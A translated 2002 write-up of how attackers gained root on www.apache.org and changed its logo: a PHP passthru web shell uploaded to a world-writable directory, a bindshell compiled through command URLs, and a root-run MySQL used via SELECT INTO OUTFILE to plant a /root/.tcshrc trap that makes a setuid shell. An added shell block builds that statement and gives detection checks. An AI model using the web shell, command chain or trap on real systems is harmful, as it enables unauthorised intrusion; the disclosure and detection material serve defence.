How we broke into www.apache.org | http://www.cshu.net
How we broke into www.apache.org
www.cshu.net  2002-8-18  fog rain village

How we broke into www.apache.org
By {} and Hardbeat
Translated by: Quack

I. Preface
This article does not disclose any new vulnerability. It only points out an ordinary configuration mistake, one that even the apache.org staff can make :) So take it as a reminder: patch and configure your systems properly, and you prevent this kind of malicious attack.
II. Introduction
This describes how, over the course of one week, we obtained root privileges on the machine running www.apache.org and changed the logo on its home page from "Powered by Apache" (the feather) to "Powered by Microsoft BackOffice". We made no other modification, apart from helping them expel other (possibly malicious) intruders.

The holes described here are not even Apache-related; they are purely configuration faults, one of them in BugZilla ... ... whose developers describe the configuration procedure exhaustively in the README, so all of that is the user's responsibility, and Apache users need not worry about it :).

The reason we went after www.apache.org is that far too many servers run Apache: if its home machine is insecure, an intruder could plant a back door in the source code there, endangering a great many users.

Naturally we did not want to see that happen, so we helped Apache fix the holes. Of course, once we had ROOT we could not restrain the urge to change the main page :) A small joke.

Below is the entire intrusion process:
1. ftproot == wwwroot, o+w dirs
While checking whether the new Apache httpd release had a buffer overflow, we connected to ftp://ftp.apache.org and http://www.apache.org and noticed that they were the identical directory, and that a world-writable directory existed in it!
So we wrote a small script, wuh.php3, containing the following lines:
<?
passthru($cmd);   /* $cmd is the ?cmd= query parameter, which PHP 3 exposes as a global */
?>
and uploaded it into the writable directory.
2. Our commands executed
So, very conveniently, the id command could be run through the following URL:
http://www.apache.org/thatdir/wuh.php3?cmd=id
After also uploading a bindshell program (httpd.c), we compiled it with something like
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c
and then ran it... ...
http://www.apache.org/thatdir/wuh.php3?cmd=./httpd

3. The shell
The bindshell we used has password authentication :) so it is somewhat safer.
Now we could telnet to port 65533, where we had bound it, and get a shell as nobody, because CGI runs under the nobody account.

4. The apache.org box
On the apache.org machine we found:
-o=rx /root
-o=rx homedirs

apache.org runs FreeBSD 3.4. We did not want to get root through some random buffer-overflow exploit; let's try to obtain the highest privilege purely through their misconfigurations!

5. Mysql
After a long search we found that mysql was running with root privileges and was reachable locally. Because apache.org also ran BugZilla, which needs a mysql account and stores its user/password in plain text, the account and password for the mysql database were very easy to obtain.
We downloaded nportredird (as the name suggests, a port-redirection tool) and set it up to accept connections from my IP and redirect port 23306 to local port 3306, so that I could use my local mysql client.
6. Full control of mysql, creating files with it
Once in through port 3306, we logged into BugZilla's database with the bugs account, one of the security problems its default installation brings... ... including running mysqld as root... .
With a 'SELECT ... INTO OUTFILE;' statement we could create a file anywhere on the box as root. The file gets mode 666 and cannot overwrite an existing file, but it is still useful; how would you use it? An .rhosts file was no help: rshd was not accepting connections, so rsh could not be used.
7. Adding /root/.tcshrc
So we decided to lay a trap for him :) We created the file /root/.tcshrc in root's home directory, containing:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc

8. ROOT!!
Simple as that. Now we only had to wait for someone to run su; luckily we did not have to wait long and obtained the suid shell. After becoming root the rest is hardly worth mentioning: we changed the main page and sent an e-mail to the host administrator reporting the hole.
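Steps 5 to 8 chain a database password into a root shell. The block below is an added example, not the original authors' tooling: it builds the trap file from step 7, wraps it in the SELECT ... INTO OUTFILE statement that a root-owned mysqld would use to write it (mysqld itself writes the file, with its own privileges, which is why "mysqld runs as root" matters), and then gives the two checks a responder would run afterwards: a scan for setuid files in a scratch directory such as /tmp, and a look for the startup-file trap in a home directory. The file contents and paths are the ones in the write-up; the function names are assumptions.

```shell
#!/bin/sh
# Added example for the INTO OUTFILE -> .tcshrc -> suid shell chain and its
# detection. Not the original authors' code; helper names are assumptions.

# The trap from step 7: root's tcsh reads ~/.tcshrc at startup, so the next
# "su" runs this, leaves a setuid copy of /bin/sh in /tmp and removes itself.
tcshrc_trap() {
    printf '%s\n' '#!/bin/sh' \
        'cp /bin/sh /tmp/.rootsh' \
        'chmod 4755 /tmp/.rootsh' \
        'rm -f /root/.tcshrc'
}

# Wrap a script body read from stdin in a SELECT ... INTO OUTFILE statement
# that writes it to $1. MySQL expands \n inside a single-quoted literal, so
# each line break is encoded as the two characters '\' 'n'; single quotes
# are escaped as \'. INTO OUTFILE refuses to overwrite an existing file and
# creates the new one mode 666, exactly as the write-up describes.
outfile_statement() {
    body=$(sed "s/'/\\\\'/g" | awk 'BEGIN { ORS = "\\n" } { print }')
    printf "SELECT '%s' INTO OUTFILE '%s';\n" "$body" "$1"
}

# Detection: list setuid regular files under $1. A hidden setuid copy of
# /bin/sh in /tmp has no legitimate reason to exist.
find_setuid_files() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Detection: does the home directory $1 carry a .tcshrc that plants a setuid
# binary? Matches the trap above; adapt the pattern for other dotfiles
# (.cshrc, .profile, .bashrc) that a login shell sources.
startup_trap_present() {
    [ -f "$1/.tcshrc" ] && grep -q 'chmod 4755' "$1/.tcshrc"
}
```

`tcshrc_trap | outfile_statement /root/.tcshrc` prints the single statement the attackers needed once they had a root-privileged mysqld and a valid account. The fix on the database side is not a password alone: run mysqld as an unprivileged user, and on current MySQL set secure_file_priv so INTO OUTFILE can only write into one designated directory. On the host side, `find_setuid_files /tmp` and `startup_trap_present /root` are cheap checks to script into a periodic audit.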
9. Fixing the ftproot==wwwroot hole
Another thing we did after getting into the system: we created a separate ftproot, moved dist to ftproot/dist and pointed the FTP root at that directory. The writable directory was thus changed so that an intruder can no longer use it, while the FTP service stays unchanged... ...

10. What could we have done?

Remember what happened last year at ftp.win.tue.nl? Someone put a trojan into tcp_wrappers :) If we had wanted to, we could have put a trojan into the Apache source release and let everybody download the backdoored version. Quite exciting, isn't it? :)
11. Summary:
Discovered ftproot==webroot ---> a writable directory allowed uploading a php3 script ---> mysqld running as root, and moreover without password protection... ... That is where the configuration was wrong.
Good... ... everything went smoothly :)
---------------------------------------------------



              Original author: Hardbeat 
Origin: Zhonglian Lümeng (NSFocus)
